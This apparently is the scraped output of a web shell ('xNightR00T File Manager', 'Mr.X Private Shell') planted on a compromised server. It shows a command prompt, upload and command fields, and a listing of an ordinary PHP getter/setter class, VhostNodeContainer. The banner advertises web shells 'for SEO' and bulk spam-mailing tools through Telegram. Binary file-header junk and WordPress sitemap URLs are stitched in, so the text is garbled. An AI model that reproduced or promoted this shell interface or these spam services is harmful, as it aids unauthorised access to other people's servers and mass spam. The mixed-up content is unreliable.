xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace Vhost;

use Vhost\Entity\VhostNode;

class VhostNodeContainer
{
    const STATUS_OK                     = 0;
    const STATUS_ERROR                  = 1;
    const STATUS_PENDING_RESTART        = 2;
    const STATUS_WARNING                = 3;
    const STATUS_DEPLOYMENT_NOT_ENABLED = 4;
    const STATUS_CREATE_ERROR           = 5;

    protected $id;
    protected $vhostId;
    protected $nodeId;
    protected $status;
    protected $lastMessage;
    protected $name;

    public function __construct(VhostNode $vhostNode)
    {
        $this->id          = $vhostNode->getId();
        $this->vhostId     = $vhostNode->getVhostId();
        $this->nodeId      = $vhostNode->getNodeId();
        $this->status      = $vhostNode->getStatus();
        $this->lastMessage = $vhostNode->getStatusMessage();
        $this->name        = $vhostNode->getName();
    }

    public function getId()
    {
        return $this->id;
    }

    public function getVhostId()
    {
        return $this->vhostId;
    }

    public function getNodeId()
    {
        return $this->nodeId;
    }

    public function getStatus()
    {
        return $this->status;
    }

    public function getLastMessage()
    {
        return $this->lastMessage;
    }

    /**
     * @return string
     */
    public function getName()
    {
        return $this->name;
    }

    public function setId($id)
    {
        $this->id = $id;
        return $this;
    }

    public function setVhostId($vhostId)
    {
        $this->vhostId = $vhostId;
        return $this;
    }

    public function setNodeId($nodeId)
    {
        $this->nodeId = $nodeId;
        return $this;
    }

    public function setStatus($status)
    {
        $this->status = $status;
        return $this;
    }

    public function setLastMessage($lastMessage)
    {
        $this->lastMessage = $lastMessage;
        return $this;
    }

    /**
     * @param string $name
     */
    public function setName($name)
    {
        $this->name = $name;
        return $this;
    }
}

Filemanager

Name Type Size Permission Actions
Controller Folder 0755
Entity Folder 0755
Filter Folder 0755
Form Folder 0755
Mapper Folder 0755
Reply Folder 0755
StdLib Folder 0755
Validator Folder 0755
View Folder 0755
VhostNodeContainer.php File 2.01 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml